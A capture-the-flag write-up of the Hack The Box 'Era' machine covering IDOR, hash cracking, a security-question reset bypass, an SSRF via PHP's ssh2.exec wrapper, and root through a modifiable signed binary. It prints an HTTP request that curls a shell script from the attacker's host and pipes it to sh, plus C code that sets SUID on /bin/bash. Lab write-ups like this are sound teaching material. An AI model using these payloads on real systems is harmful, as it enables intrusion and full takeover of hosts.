Era HTB Write Up¶
1. Target Information¶
IP Machine: 10.10.11.79
Domain: era.htb
2. Initial Reconnaissance¶
2.1 Port Scanning¶
2.2 Host Enumeration¶
First of all I will start by enumerating the website, so we need to add the domain era.htb to our /etc/hosts so I do it with this oneliner.
Now lets take a look to the website.
Here we can see that all buttons redirects to the same website, so there's nothing in here, lets enumerate subdomains now.
3. Web Enumeration¶
3.1 Subdomain Discovery¶
To enumerate subdomains I did it with gobuster.
gobuster vhost -u http://era.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -t 100
Here we can see that file.era.htb it's a valid subdomain, so let's add it to our /etc/hosts.
Lets take a look now at this website. We can see several options, one of them a file upload functionality, but all requires authentication and I have no valid credentials.
3.2 Website Content Discovery¶
So lets move forward, here I runned gobuster to enumerate the website.
After enumerating I found a valid file called register.php so let's register and login to the website.
3.3 User Registration and Login¶
Here I registered.
And here I logged in.
4. File Upload Functionality¶
4.1 Attempting Malicious Uploads¶
Now I will start by uploading a malicious php file and see what happens.
After uploading it it retrieves me a unique ID for that file.
4.2 IDOR to Discover Other Files¶
I will try a minimal IDOR, I will intercept this request http://file.era.htb/download.php?id=9430 and apply fuzzing in the ID in the intruder.
If we take a look at the content length here we can see 2 id's which it's content length it's different, that means that are valid. Let's see what they are.
The first id gives a .zip called signing
Other one seems to be a full backup from the site.
5. Looting Sensitive Files¶
5.1 Downloading and Extracting Backups¶
Once I unzipped bot zips these are its contents.
We can see there's a sqlite3 file so let's take a look.
5.2 SQLite Database Analysis¶
In this database, we can see several hashes and users, now I will attempt to crack any hashes using hashcat.
This is my hashes.txt file.
5.3 Cracking User Hashes¶
To crack them I used this command.
And It cracked two passwords.
6. FTP Access¶
6.1 Valid User Discovery¶
Now with netexec I will check what users are valid on these passwords in the FTP service.
Only yuri is valid so lets login to the ftp.
6.2 Downloading FTP Content¶
Here there's two folders.
With mget* I retrieved all the content into my system.
Now I will focus into initial shell, and I will focus later in the ftp files.
7. Privilege Escalation via Web App¶
7.1 Abuse of Security Questions Reset Function¶
After enumerating the website I while I found this reset.php here we can abuse and reset admin security questions and login as admin.
So as long we know the username it applies for every user and we can reset their security questions.
7.2 Logging in as Admin¶
Now in this endpoint we can login abusing this security questions.
And we are as admin.
7.3 File Upload and Intercepting Request¶
Now we will go back to the website and upload a file as admin and I will intercept it Burpsuite.
If we take a look at the download.php we can see there's 2 parameters.
8. Gaining Initial Shell¶
8.1 SSRF with PHP Wrappers for Remote Code Execution¶
To get a reverseshell I will try to abuse from php wrappers.
This works, because the parameter format leads to a SSRF so with php wrappers we can use ssh2.exec to login via ssh and execute a curl to our malicious resource and execute it with bash.
This is the following content from shell.sh
If I send the following request in the Burpsuite
GET /download.php?id=8132&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/curl+-s+10.10.XX.XX/shell.sh|sh; HTTP/1.1
Host: file.era.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=8l4et0hjhnlnhc0p39skjqvqbi
Upgrade-Insecure-Requests: 1
Priority: u=0, i
8.2 Reverse Shell as yuri¶
We will get a reverseshell as yuri.
9. Lateral Movement¶
9.1 Password Reuse for eric¶
Now I will try to attempt a password spraying with the previous password america.
9.2 Accessing User Flag¶
So I tried to use it as eric and it worked. Flag can be found here cat /home/eric/user.txt
10. Root Privilege Escalation¶
10.1 Abusing Group Permissions on Binary¶
For root after enumerating for a while I found the following folder, here we can modify the content from this binary, we can modify it because eric it's a member from the group devs.
10.2 Crafting a Malicious ELF¶
First of all in my machine I created my malicious C file with the following content.
#include <unistd.h>
int main() {
char *args[] = {"/bin/bash", "-c", "chmod u+s /bin/bash", NULL};
execve("/bin/bash", args, NULL);
return 0;
}
And I will compile it.
10.3 Signing with Custom Signer¶
Then we need to use this github script to sign the content, because needs to be signed in to be accepted.
NUAA-WatchDog Linux ELF Binary Signer
We can sign our malicious binary like that.
10.4 Overwriting Binary and Triggering SUID Shell¶
Now as eric we will perform the following command to change the binary for our malicious one.
Once uploaded it if we wait a little we will have suid permission in our /bin/bash
11. Root Access Achieved¶
11.1 Executing Root Shell¶
And we can execute a shell as root.
Made by Astro